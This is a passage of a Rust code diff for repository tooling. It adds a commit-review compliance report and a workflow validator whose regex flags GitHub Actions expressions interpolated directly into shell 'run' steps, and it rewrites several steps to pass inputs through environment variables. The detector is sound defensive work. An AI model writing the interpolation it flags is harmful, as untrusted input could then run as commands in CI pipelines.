.count(), + } + } + + pub fn review_summary(&self) -> ReportReviewSummary { + match self.not_reviewed { + 0 if self.errors == 0 => ReportReviewSummary::NoIssuesFound, + 1.. if self.errors == 0 => ReportReviewSummary::MissingReviews, + _ => ReportReviewSummary::MissingReviewsWithErrors, + } + } + + fn has_errors(&self) -> bool { + self.errors > 0 + } +} + +#[derive(Clone, Copy, Debug, Display, PartialEq, Eq, PartialOrd, Ord)] +enum IssueKind { + #[display("Error")] + Error, + #[display("Not reviewed")] + NotReviewed, +} + +#[derive(Debug, Default)] +pub struct Report { + entries: Vec>, +} + +impl Report { + pub fn new() -> Self { + Self::default() + } + + pub fn add(&mut self, commit: CommitDetails, result: ReviewResult) { + self.entries.push(ReportEntry { + commit, + reason: result, + }); + } + + pub fn errors(&self) -> impl Iterator> { + self.entries.iter().filter(|entry| entry.reason.is_err()) + } + + pub fn summary(&self) -> ReportSummary { + ReportSummary::from_entries(&self.entries) + } + + pub fn write_markdown(self, path: impl AsRef) -> anyhow::Result<()> { + let path = path.as_ref(); + + if let Some(parent) = path + .parent() + .filter(|parent| !parent.as_os_str().is_empty()) + { + fs::create_dir_all(parent).with_context(|| { + format!( + "Failed to create parent directory for markdown report at {}", + path.display() + ) + })?; + } + + let summary = self.summary(); + let (successes, mut issues): (Vec<_>, Vec<_>) = + self.entries + .into_iter() + .partition_map(|entry| match entry.reason { + Ok(success) => Either::Left(ReportEntry { + reason: success, + commit: entry.commit, + }), + Err(fail) => Either::Right(ReportEntry { + reason: fail, + commit: entry.commit, + }), + }); + + issues.sort_by_key(|entry| entry.issue_kind()); + + let file = File::create(path) + .with_context(|| format!("Failed to create markdown report at {}", path.display()))?; + let mut writer = BufWriter::new(file); + + writeln!(writer, "# Compliance report")?; + writeln!(writer)?; + writeln!(writer, "## Overview")?; + writeln!(writer)?; + writeln!(writer, "- PRs: {}", summary.pull_requests)?; + writeln!(writer, "- Reviewed: {}", summary.reviewed)?; + writeln!(writer, "- Not reviewed: {}", summary.not_reviewed)?; + if summary.has_errors() { + writeln!(writer, "- Errors: {}", summary.errors)?; + } + writeln!(writer)?; + + write_issue_table(&mut writer, &issues, &summary)?; + write_success_table(&mut writer, &successes)?; + + writer + .flush() + .with_context(|| format!("Failed to flush markdown report to {}", path.display())) + } +} + +fn write_issue_table( + writer: &mut impl Write, + issues: &[ReportEntry], + summary: &ReportSummary, +) -> std::io::Result<()> { + if summary.has_errors() { + writeln!(writer, "## Errors and unreviewed commits")?; + } else { + writeln!(writer, "## Unreviewed commits")?; + } + writeln!(writer)?; + + if issues.is_empty() { + if summary.has_errors() { + writeln!(writer, "No errors or unreviewed commits found.")?; + } else { + writeln!(writer, "No unreviewed commits found.")?; + } + writeln!(writer)?; + return Ok(()); + } + + writeln!(writer, "| Commit | PR | Author | Outcome | Reason |")?; + writeln!(writer, "| --- | --- | --- | --- | --- |")?; + + for entry in issues { + let issue_kind = entry.issue_kind(); + writeln!( + writer, + "| {} | {} | {} | {} | {} |", + entry.commit_cell(), + entry.pull_request_cell(), + entry.author_cell(), + issue_kind, + entry.reason_cell(), + )?; + } + + writeln!(writer)?; + Ok(()) +} + +fn write_success_table( + writer: &mut impl Write, + successful_entries: &[ReportEntry], +) -> std::io::Result<()> { + writeln!(writer, "## Successful commits")?; + writeln!(writer)?; + + if successful_entries.is_empty() { + writeln!(writer, "No successful commits found.")?; + writeln!(writer)?; + return Ok(()); + } + + writeln!(writer, "| Commit | PR | Author | Reviewers | Reason |")?; + writeln!(writer, "| --- | --- | --- | --- | --- |")?; + + for entry in successful_entries { + writeln!( + writer, + "| {} | {} | {} | {} | {} |", + entry.commit_cell(), + entry.pull_request_cell(), + entry.author_cell(), + entry.reviewers_cell(), + entry.reason_cell(), + )?; + } + + writeln!(writer)?; + Ok(()) +} + +fn escape_markdown_link_text(input: &str) -> String { + escape_markdown_table_text(input) + .replace('[', r"\[") + .replace(']', r"\]") +} + +fn escape_markdown_table_text(input: &str) -> String { + input + .replace('\\', r"\\") + .replace('|', r"\|") + .replace('\r', "") + .replace('\n', "
") +} + +#[cfg(test)] +mod tests { + use std::str::FromStr; + + use crate::{ + checks::{ReviewFailure, ReviewSuccess}, + git::{CommitDetails, CommitList}, + github::{GitHubUser, PullRequestReview, ReviewState}, + }; + + use super::{Report, ReportReviewSummary}; + + fn make_commit( + sha: &str, + author_name: &str, + author_email: &str, + title: &str, + body: &str, + ) -> CommitDetails { + let formatted = format!( + "{sha}|field-delimiter|{author_name}|field-delimiter|{author_email}|field-delimiter|{title}|body-delimiter|{body}|commit-delimiter|" + ); + CommitList::from_str(&formatted) + .expect("test commit should parse") + .into_iter() + .next() + .expect("should have one commit") + } + + fn reviewed() -> ReviewSuccess { + ReviewSuccess::PullRequestReviewed(vec![PullRequestReview { + user: Some(GitHubUser { + login: "reviewer".to_owned(), + }), + state: Some(ReviewState::Approved), + }]) + } + + #[test] + fn report_summary_counts_are_accurate() { + let mut report = Report::new(); + + report.add( + make_commit( + "aaa", + "Alice", + "alice@test.com", + "Reviewed commit (#100)", + "", + ), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Unreviewed commit (#200)", ""), + Err(ReviewFailure::Unreviewed), + ); + report.add( + make_commit("ccc", "Carol", "carol@test.com", "No PR commit", ""), + Err(ReviewFailure::NoPullRequestFound), + ); + report.add( + make_commit("ddd", "Dave", "dave@test.com", "Error commit (#300)", ""), + Err(ReviewFailure::Other(anyhow::anyhow!("some error"))), + ); + + let summary = report.summary(); + assert_eq!(summary.pull_requests, 3); + assert_eq!(summary.reviewed, 1); + assert_eq!(summary.not_reviewed, 2); + assert_eq!(summary.errors, 1); + } + + #[test] + fn report_summary_all_reviewed_is_no_issues() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "First (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Second (#200)", ""), + Ok(reviewed()), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::NoIssuesFound + )); + } + + #[test] + fn report_summary_missing_reviews_only() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "Reviewed (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Unreviewed (#200)", ""), + Err(ReviewFailure::Unreviewed), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::MissingReviews + )); + } + + #[test] + fn report_summary_errors_and_missing_reviews() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "Unreviewed (#100)", ""), + Err(ReviewFailure::Unreviewed), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Errored (#200)", ""), + Err(ReviewFailure::Other(anyhow::anyhow!("check failed"))), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::MissingReviewsWithErrors + )); + } + + #[test] + fn report_summary_deduplicates_pull_requests() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "First change (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Second change (#100)", ""), + Ok(reviewed()), + ); + + let summary = report.summary(); + assert_eq!(summary.pull_requests, 1); + } +} diff --git a/tooling/xtask/Cargo.toml b/tooling/xtask/Cargo.toml index 13179b2eb69ba9a63ba6be5784907b78bba1b9f2..f9628dfa6390872210df9f3cc00b367d9420f522 100644 --- a/tooling/xtask/Cargo.toml +++ b/tooling/xtask/Cargo.toml @@ -9,15 +9,22 @@ license = "GPL-3.0-or-later" workspace = true [dependencies] +annotate-snippets = "0.12.1" anyhow.workspace = true backtrace.workspace = true cargo_metadata.workspace = true cargo_toml.workspace = true clap = { workspace = true, features = ["derive"] } -toml.workspace = true +compliance = { workspace = true, features = ["octo-client"] } +gh-workflow.workspace = true indoc.workspace = true indexmap.workspace = true +itertools.workspace = true +regex.workspace = true serde.workspace = true serde_json.workspace = true +serde_yaml = "0.9.34" +strum.workspace = true +tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } +toml.workspace = true toml_edit.workspace = true -gh-workflow.workspace = true diff --git a/tooling/xtask/src/main.rs b/tooling/xtask/src/main.rs index 8246b98772184276ecabc685a9b4d2e7c5346edf..c442f1c509e28172b7283c95e518eee743b7730c 100644 --- a/tooling/xtask/src/main.rs +++ b/tooling/xtask/src/main.rs @@ -15,6 +15,7 @@ struct Args { enum CliCommand { /// Runs `cargo clippy`. Clippy(tasks::clippy::ClippyArgs), + Compliance(tasks::compliance::ComplianceArgs), Licenses(tasks::licenses::LicensesArgs), /// Checks that packages conform to a set of standards. PackageConformity(tasks::package_conformity::PackageConformityArgs), @@ -23,6 +24,7 @@ enum CliCommand { /// Builds GPUI web examples and serves them. WebExamples(tasks::web_examples::WebExamplesArgs), Workflows(tasks::workflows::GenerateWorkflowArgs), + CheckWorkflows(tasks::workflow_checks::WorkflowValidationArgs), } fn main() -> Result<()> { @@ -30,6 +32,7 @@ fn main() -> Result<()> { match args.command { CliCommand::Clippy(args) => tasks::clippy::run_clippy(args), + CliCommand::Compliance(args) => tasks::compliance::check_compliance(args), CliCommand::Licenses(args) => tasks::licenses::run_licenses(args), CliCommand::PackageConformity(args) => { tasks::package_conformity::run_package_conformity(args) @@ -37,5 +40,6 @@ fn main() -> Result<()> { CliCommand::PublishGpui(args) => tasks::publish_gpui::run_publish_gpui(args), CliCommand::WebExamples(args) => tasks::web_examples::run_web_examples(args), CliCommand::Workflows(args) => tasks::workflows::run_workflows(args), + CliCommand::CheckWorkflows(args) => tasks::workflow_checks::validate(args), } } diff --git a/tooling/xtask/src/tasks.rs b/tooling/xtask/src/tasks.rs index 4701b56d8dd201ad5b5f28764976b0c5397f3a3e..ea67d0abc5fcbd8e85f40251a7997bc6fbbbca1f 100644 --- a/tooling/xtask/src/tasks.rs +++ b/tooling/xtask/src/tasks.rs @@ -1,6 +1,8 @@ pub mod clippy; +pub mod compliance; pub mod licenses; pub mod package_conformity; pub mod publish_gpui; pub mod web_examples; +pub mod workflow_checks; pub mod workflows; diff --git a/tooling/xtask/src/tasks/compliance.rs b/tooling/xtask/src/tasks/compliance.rs new file mode 100644 index 0000000000000000000000000000000000000000..78cc32b23f3160ae950aaa5e374071dd107ec350 --- /dev/null +++ b/tooling/xtask/src/tasks/compliance.rs @@ -0,0 +1,135 @@ +use std::path::PathBuf; + +use anyhow::{Context, Result}; +use clap::Parser; + +use compliance::{ + checks::Reporter, + git::{CommitsFromVersionToHead, GetVersionTags, GitCommand, VersionTag}, + github::GitHubClient, + report::ReportReviewSummary, +}; + +#[derive(Parser)] +pub struct ComplianceArgs { + #[arg(value_parser = VersionTag::parse)] + // The version to be on the lookout for + pub(crate) version_tag: VersionTag, + #[arg(long)] + // The markdown file to write the compliance report to + report_path: PathBuf, + #[arg(long)] + // An optional branch to use instead of the determined version branch + branch: Option, +} + +impl ComplianceArgs { + pub(crate) fn version_tag(&self) -> &VersionTag { + &self.version_tag + } + + fn version_branch(&self) -> String { + self.branch.clone().unwrap_or_else(|| { + format!( + "v{major}.{minor}.x", + major = self.version_tag().version().major, + minor = self.version_tag().version().minor + ) + }) + } +} + +async fn check_compliance_impl(args: ComplianceArgs) -> Result<()> { + let app_id = std::env::var("GITHUB_APP_ID").context("Missing GITHUB_APP_ID")?; + let key = std::env::var("GITHUB_APP_KEY").context("Missing GITHUB_APP_KEY")?; + + let tag = args.version_tag(); + + let previous_version = GitCommand::run(GetVersionTags)? + .sorted() + .find_previous_minor_version(&tag) + .cloned() + .ok_or_else(|| { + anyhow::anyhow!( + "Could not find previous version for tag {tag}", + tag = tag.to_string() + ) + })?; + + println!( + "Checking compliance for version {} with version {} as base", + tag.version(), + previous_version.version() + ); + + let commits = GitCommand::run(CommitsFromVersionToHead::new( + previous_version, + args.version_branch(), + ))?; + + let Some(range) = commits.range() else { + anyhow::bail!("No commits found to check"); + }; + + println!("Checking commit range {range}, {} total", commits.len()); + + let client = GitHubClient::for_app( + app_id.parse().context("Failed to parse app ID as int")?, + key.as_ref(), + ) + .await?; + + println!("Initialized GitHub client for app ID {app_id}"); + + let report = Reporter::new(commits, &client).generate_report().await?; + + println!( + "Generated report for version {}", + args.version_tag().to_string() + ); + + let summary = report.summary(); + + println!( + "Applying compliance labels to {} pull requests", + summary.pull_requests + ); + + for report in report.errors() { + if let Some(pr_number) = report.commit.pr_number() { + println!("Adding review label to PR {}...", pr_number); + + client + .add_label_to_pull_request(compliance::github::PR_REVIEW_LABEL, pr_number) + .await?; + } + } + + let report_path = args.report_path.with_extension("md"); + + report.write_markdown(&report_path)?; + + println!("Wrote compliance report to {}", report_path.display()); + + match summary.review_summary() { + ReportReviewSummary::MissingReviews => Err(anyhow::anyhow!( + "Compliance check failed, found {} commits not reviewed", + summary.not_reviewed + )), + ReportReviewSummary::MissingReviewsWithErrors => Err(anyhow::anyhow!( + "Compliance check failed with {} unreviewed commits and {} other issues", + summary.not_reviewed, + summary.errors + )), + ReportReviewSummary::NoIssuesFound => { + println!("No issues found, compliance check passed."); + Ok(()) + } + } +} + +pub fn check_compliance(args: ComplianceArgs) -> Result<()> { + tokio::runtime::Runtime::new() + .context("Failed to create tokio runtime") + .and_then(|handle| handle.block_on(check_compliance_impl(args))) +} diff --git a/tooling/xtask/src/tasks/web_examples.rs b/tooling/xtask/src/tasks/web_examples.rs index 93179c92ca9a021838d48ae6a976f3c2a434f6a2..5b8e0fdd610e39a8ee020eddfbc9b98d00bdf419 100644 --- a/tooling/xtask/src/tasks/web_examples.rs +++ b/tooling/xtask/src/tasks/web_examples.rs @@ -71,6 +71,8 @@ pub fn run_web_examples(args: WebExamplesArgs) -> Result<()> { "gpui", "--keep-going", ]); + // 🙈 + cmd.env("RUSTC_BOOTSTRAP", "1"); for name in &examples { cmd.args(["--example", name]); } @@ -109,6 +111,8 @@ pub fn run_web_examples(args: WebExamplesArgs) -> Result<()> { "--out-name", name, ]) + // 🙈 + .env("RUSTC_BOOTSTRAP", "1") .status() .context("failed to run wasm-bindgen")?; if !status.success() { diff --git a/tooling/xtask/src/tasks/workflow_checks.rs b/tooling/xtask/src/tasks/workflow_checks.rs new file mode 100644 index 0000000000000000000000000000000000000000..d6be0299327ad2dd4b4a126a61a8b2ae6ddb9fd3 --- /dev/null +++ b/tooling/xtask/src/tasks/workflow_checks.rs @@ -0,0 +1,118 @@ +mod check_run_patterns; + +use std::{fs, path::PathBuf}; + +use annotate_snippets::Renderer; +use anyhow::{Result, anyhow}; +use clap::Parser; +use itertools::{Either, Itertools}; +use serde_yaml::Value; +use strum::IntoEnumIterator; + +use crate::tasks::{ + workflow_checks::check_run_patterns::{ + RunValidationError, WorkflowFile, WorkflowValidationError, + }, + workflows::WorkflowType, +}; + +pub use check_run_patterns::validate_run_command; + +#[derive(Default, Parser)] +pub struct WorkflowValidationArgs {} + +pub fn validate(_: WorkflowValidationArgs) -> Result<()> { + let (parsing_errors, file_errors): (Vec<_>, Vec<_>) = get_all_workflow_files() + .map(check_workflow) + .flat_map(Result::err) + .partition_map(|error| match error { + WorkflowError::ParseError(error) => Either::Left(error), + WorkflowError::ValidationError(error) => Either::Right(error), + }); + + if !parsing_errors.is_empty() { + Err(anyhow!( + "Failed to read or parse some workflow files: {}", + parsing_errors.into_iter().join("\n") + )) + } else if !file_errors.is_empty() { + let errors: Vec<_> = file_errors + .iter() + .map(|error| error.annotation_group()) + .collect(); + + let renderer = + Renderer::styled().decor_style(annotate_snippets::renderer::DecorStyle::Ascii); + println!("{}", renderer.render(errors.as_slice())); + + Err(anyhow!("Workflow checks failed!")) + } else { + Ok(()) + } +} + +enum WorkflowError { + ParseError(anyhow::Error), + ValidationError(Box), +} + +fn get_all_workflow_files() -> impl Iterator { + WorkflowType::iter() + .map(|workflow_type| workflow_type.folder_path()) + .flat_map(|folder_path| { + fs::read_dir(folder_path).into_iter().flat_map(|entries| { + entries + .flat_map(Result::ok) + .map(|entry| entry.path()) + .filter(|path| { + path.extension() + .is_some_and(|ext| ext == "yaml" || ext == "yml") + }) + }) + }) +} + +fn check_workflow(workflow_file_path: PathBuf) -> Result<(), WorkflowError> { + fn collect_errors( + iter: impl Iterator>>, + ) -> Result<(), Vec> { + Some(iter.flat_map(Result::err).flatten().collect::>()) + .filter(|errors| !errors.is_empty()) + .map_or(Ok(()), Err) + } + + fn check_recursive(key: &Value, value: &Value) -> Result<(), Vec> { + match value { + Value::Mapping(mapping) => collect_errors( + mapping + .into_iter() + .map(|(key, value)| check_recursive(key, value)), + ), + Value::Sequence(sequence) => collect_errors( + sequence + .into_iter() + .map(|value| check_recursive(key, value)), + ), + Value::String(string) => check_string(key, string).map_err(|error| vec![error]), + Value::Null | Value::Bool(_) | Value::Number(_) | Value::Tagged(_) => Ok(()), + } + } + + let file_content = + WorkflowFile::load(&workflow_file_path).map_err(WorkflowError::ParseError)?; + + check_recursive(&Value::Null, &file_content.parsed_content).map_err(|errors| { + WorkflowError::ValidationError(Box::new(WorkflowValidationError::new( + errors, + file_content, + workflow_file_path, + ))) + }) +} + +fn check_string(key: &Value, value: &str) -> Result<(), RunValidationError> { + match key { + Value::String(key) if key == "run" => validate_run_command(value), + _ => Ok(()), + } +} diff --git a/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs b/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs new file mode 100644 index 0000000000000000000000000000000000000000..50c435d033336dd82d2f110f5c880dff0d677e52 --- /dev/null +++ b/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs @@ -0,0 +1,124 @@ +use annotate_snippets::{AnnotationKind, Group, Level, Snippet}; +use anyhow::{Result, anyhow}; +use regex::Regex; +use serde_yaml::Value; +use std::{ + collections::HashMap, + fs, + ops::Range, + path::{Path, PathBuf}, + sync::LazyLock, +}; + +static GITHUB_INPUT_PATTERN: LazyLock = LazyLock::new(|| { + Regex::new(r#"\$\{\{[[:blank:]]*([[:alnum:]]|[[:punct:]])+?[[:blank:]]*\}\}"#) + .expect("Should compile") +}); + +pub struct WorkflowFile { + raw_content: String, + pub parsed_content: Value, +} + +impl WorkflowFile { + pub fn load(workflow_file_path: &Path) -> Result { + fs::read_to_string(workflow_file_path) + .map_err(|_| { + anyhow!( + "Could not read workflow file at {}", + workflow_file_path.display() + ) + }) + .and_then(|file_content| { + serde_yaml::from_str(&file_content) + .map(|parsed_content| Self { + raw_content: file_content, + parsed_content, + }) + .map_err(|e| anyhow!("Failed to parse workflow file: {e:?}")) + }) + } +} + +pub struct WorkflowValidationError { + file_path: PathBuf, + contents: WorkflowFile, + errors: Vec, +} + +impl WorkflowValidationError { + pub fn new( + errors: Vec, + contents: WorkflowFile, + file_path: PathBuf, + ) -> Self { + Self { + file_path, + contents, + errors, + } + } + + pub fn annotation_group<'a>(&'a self) -> Group<'a> { + let raw_content = &self.contents.raw_content; + let mut identical_lines = HashMap::new(); + + let ranges = self + .errors + .iter() + .flat_map(|error| error.found_injection_patterns.iter()) + .map(|(line, pattern_range)| { + let initial_offset = identical_lines + .get(&(line.as_str(), pattern_range.start)) + .copied() + .unwrap_or_default(); + + let line_start = raw_content[initial_offset..] + .find(line.as_str()) + .map(|offset| offset + initial_offset) + .unwrap_or_default(); + + let pattern_start = line_start + pattern_range.start; + let pattern_end = pattern_start + pattern_range.len(); + + identical_lines.insert((line.as_str(), pattern_range.start), pattern_end); + + pattern_start..pattern_end + }); + + Level::ERROR + .primary_title("Found GitHub input injection in run command") + .element( + Snippet::source(&self.contents.raw_content) + .path(self.file_path.display().to_string()) + .annotations(ranges.map(|range| { + AnnotationKind::Primary + .span(range) + .label("This should be passed via an environment variable") + })), + ) + } +} + +pub struct RunValidationError { + found_injection_patterns: Vec<(String, Range)>, +} + +pub fn validate_run_command(command: &str) -> Result<(), RunValidationError> { + let patterns: Vec<_> = command + .lines() + .flat_map(move |line| { + GITHUB_INPUT_PATTERN + .find_iter(line) + .map(|m| (line.to_owned(), m.range())) + }) + .collect(); + + if patterns.is_empty() { + Ok(()) + } else { + Err(RunValidationError { + found_injection_patterns: patterns, + }) + } +} diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 5663ebec247c4025f7cfbae8e9467733e2c7be2d..387c739a1ac12d4d65d11f33777525c59f05f7f2 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -4,13 +4,17 @@ use gh_workflow::Workflow; use std::fs; use std::path::{Path, PathBuf}; +use crate::tasks::workflow_checks::{self}; + mod after_release; mod autofix_pr; mod bump_patch_version; mod cherry_pick; mod compare_perf; +mod compliance_check; mod danger; mod deploy_collab; +mod extension_auto_bump; mod extension_bump; mod extension_tests; mod extension_workflow_rollout; @@ -27,38 +31,99 @@ mod runners; mod steps; mod vars; +#[derive(Clone)] +pub(crate) struct GitSha(String); + +impl AsRef for GitSha { + fn as_ref(&self) -> &str { + &self.0 + } +} + +#[allow( + clippy::disallowed_methods, + reason = "This runs only in a CLI environment" +)] +fn parse_ref(value: &str) -> Result { + const GIT_SHA_LENGTH: usize = 40; + (value.len() == GIT_SHA_LENGTH) + .then_some(value) + .ok_or_else(|| { + format!( + "Git SHA has wrong length! \ + Only SHAs with a full length of {GIT_SHA_LENGTH} are supported, found {len} characters.", + len = value.len() + ) + }) + .and_then(|value| { + let mut tmp = [0; 4]; + value + .chars() + .all(|char| u16::from_str_radix(char.encode_utf8(&mut tmp), 16).is_ok()).then_some(value) + .ok_or_else(|| "Not a valid Git SHA".to_owned()) + }) + .and_then(|sha| { + std::process::Command::new("git") + .args([ + "rev-parse", + "--quiet", + "--verify", + &format!("{sha}^{{commit}}") + ]) + .output() + .map_err(|_| "Failed to spawn Git command to verify SHA".to_owned()) + .and_then(|output| + output + .status.success() + .then_some(sha) + .ok_or_else(|| format!("SHA {sha} is not a valid Git SHA within this repository!"))) + }).map(|sha| GitSha(sha.to_owned())) +} + #[derive(Parser)] -pub struct GenerateWorkflowArgs {} +pub(crate) struct GenerateWorkflowArgs { + #[arg(value_parser = parse_ref)] + /// The Git SHA to use when invoking this + pub(crate) sha: Option, +} + +enum WorkflowSource { + Contextless(fn() -> Workflow), + WithContext(fn(&GenerateWorkflowArgs) -> Workflow), +} struct WorkflowFile { - source: fn() -> Workflow, + source: WorkflowSource, r#type: WorkflowType, } impl WorkflowFile { fn zed(f: fn() -> Workflow) -> WorkflowFile { WorkflowFile { - source: f, + source: WorkflowSource::Contextless(f), r#type: WorkflowType::Zed, } } - fn extension(f: fn() -> Workflow) -> WorkflowFile { + fn extension(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile { WorkflowFile { - source: f, + source: WorkflowSource::WithContext(f), r#type: WorkflowType::ExtensionCi, } } - fn extension_shared(f: fn() -> Workflow) -> WorkflowFile { + fn extension_shared(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile { WorkflowFile { - source: f, + source: WorkflowSource::WithContext(f), r#type: WorkflowType::ExtensionsShared, } } - fn generate_file(&self) -> Result<()> { - let workflow = (self.source)(); + fn generate_file(&self, workflow_args: &GenerateWorkflowArgs) -> Result<()> { + let workflow = match &self.source { + WorkflowSource::Contextless(f) => f(), + WorkflowSource::WithContext(f) => f(workflow_args), + }; let workflow_folder = self.r#type.folder_path(); fs::create_dir_all(&workflow_folder).with_context(|| { @@ -87,8 +152,8 @@ impl WorkflowFile { } } -#[derive(PartialEq, Eq)] -enum WorkflowType { +#[derive(PartialEq, Eq, strum::EnumIter)] +pub enum WorkflowType { /// Workflows living in the Zed repository Zed, /// Workflows living in the `zed-extensions/workflows` repository that are @@ -113,7 +178,7 @@ impl WorkflowType { ) } - fn folder_path(&self) -> PathBuf { + pub fn folder_path(&self) -> PathBuf { match self { WorkflowType::Zed => PathBuf::from(".github/workflows"), WorkflowType::ExtensionCi => PathBuf::from("extensions/workflows"), @@ -122,7 +187,7 @@ impl WorkflowType { } } -pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { +pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { if !Path::new("crates/zed/").is_dir() { anyhow::bail!("xtask workflows must be ran from the project root"); } @@ -133,15 +198,16 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(bump_patch_version::bump_patch_version), WorkflowFile::zed(cherry_pick::cherry_pick), WorkflowFile::zed(compare_perf::compare_perf), + WorkflowFile::zed(compliance_check::compliance_check), WorkflowFile::zed(danger::danger), WorkflowFile::zed(deploy_collab::deploy_collab), WorkflowFile::zed(extension_bump::extension_bump), + WorkflowFile::zed(extension_auto_bump::extension_auto_bump), WorkflowFile::zed(extension_tests::extension_tests), WorkflowFile::zed(extension_workflow_rollout::extension_workflow_rollout), WorkflowFile::zed(publish_extension_cli::publish_extension_cli), WorkflowFile::zed(release::release), WorkflowFile::zed(release_nightly::release_nightly), - WorkflowFile::zed(run_agent_evals::run_agent_evals), WorkflowFile::zed(run_agent_evals::run_cron_unit_evals), WorkflowFile::zed(run_agent_evals::run_unit_evals), WorkflowFile::zed(run_bundling::run_bundling), @@ -152,8 +218,8 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { ]; for workflow_file in workflows { - workflow_file.generate_file()?; + workflow_file.generate_file(&args)?; } - Ok(()) + workflow_checks::validate(Default::default()) } diff --git a/tooling/xtask/src/tasks/workflows/after_release.rs b/tooling/xtask/src/tasks/workflows/after_release.rs index 3936e3ffb7754d167c6c39f02e17f758bed0c1ae..07ff1fba0d4799c463128362ad4ba996ccf8cea0 100644 --- a/tooling/xtask/src/tasks/workflows/after_release.rs +++ b/tooling/xtask/src/tasks/workflows/after_release.rs @@ -123,7 +123,7 @@ fn publish_winget() -> NamedJob { "X-GitHub-Api-Version" = "2022-11-28" } $body = @{ branch = "master" } | ConvertTo-Json - $uri = "https://api.github.com/repos/${{ github.repository_owner }}/winget-pkgs/merge-upstream" + $uri = "https://api.github.com/repos/$env:GITHUB_REPOSITORY_OWNER/winget-pkgs/merge-upstream" try { Invoke-RestMethod -Uri $uri -Method Post -Headers $headers -Body $body -ContentType "application/json" Write-Host "Successfully synced winget-pkgs fork" diff --git a/tooling/xtask/src/tasks/workflows/autofix_pr.rs b/tooling/xtask/src/tasks/workflows/autofix_pr.rs index c2c89b7cd05394c225c015a6cc83f48bd35b24a4..6fa7743275f36eda1746e7afdd4caabc429fec3c 100644 --- a/tooling/xtask/src/tasks/workflows/autofix_pr.rs +++ b/tooling/xtask/src/tasks/workflows/autofix_pr.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, FluentBuilder, NamedJob, named}, + steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named}, vars::{self, StepOutput, WorkflowInput}, }; @@ -55,7 +55,8 @@ fn download_patch_artifact() -> Step { fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJob { fn checkout_pr(pr_number: &WorkflowInput) -> Step { - named::bash(&format!("gh pr checkout {pr_number}")) + named::bash(r#"gh pr checkout "$PR_NUMBER""#) + .add_env(("PR_NUMBER", pr_number.to_string())) .add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)) } @@ -133,7 +134,9 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob { fn checkout_pr(pr_number: &WorkflowInput, token: &StepOutput) -> Step { - named::bash(&format!("gh pr checkout {pr_number}")).add_env(("GITHUB_TOKEN", token)) + named::bash(r#"gh pr checkout "$PR_NUMBER""#) + .add_env(("PR_NUMBER", pr_number.to_string())) + .add_env(("GITHUB_TOKEN", token)) } fn apply_patch() -> Step { @@ -158,7 +161,13 @@ fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy() + .for_repository(RepositoryTarget::current()) + .with_permissions([ + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + ]) + .into(); named::job( Job::default() diff --git a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs index 5ef149be29313bc2078dbc1f75a82845c3d3b666..7db348c1d5980c1b21780d9fe0af4e326f6283ca 100644 --- a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs +++ b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs @@ -63,7 +63,7 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy().into(); named::job( Job::default() diff --git a/tooling/xtask/src/tasks/workflows/cherry_pick.rs b/tooling/xtask/src/tasks/workflows/cherry_pick.rs index eaa786837f84ebf4d4f7e1a579db0c7b4dcc5040..46fb41094eb9fcea3cf40c4a289217f16855483b 100644 --- a/tooling/xtask/src/tasks/workflows/cherry_pick.rs +++ b/tooling/xtask/src/tasks/workflows/cherry_pick.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, NamedJob, named}, + steps::{self, NamedJob, RepositoryTarget, TokenPermissions, named}, vars::{StepOutput, WorkflowInput}, }; @@ -35,13 +35,23 @@ fn run_cherry_pick( channel: &WorkflowInput, token: &StepOutput, ) -> Step { - named::bash(&format!("./script/cherry-pick {branch} {commit} 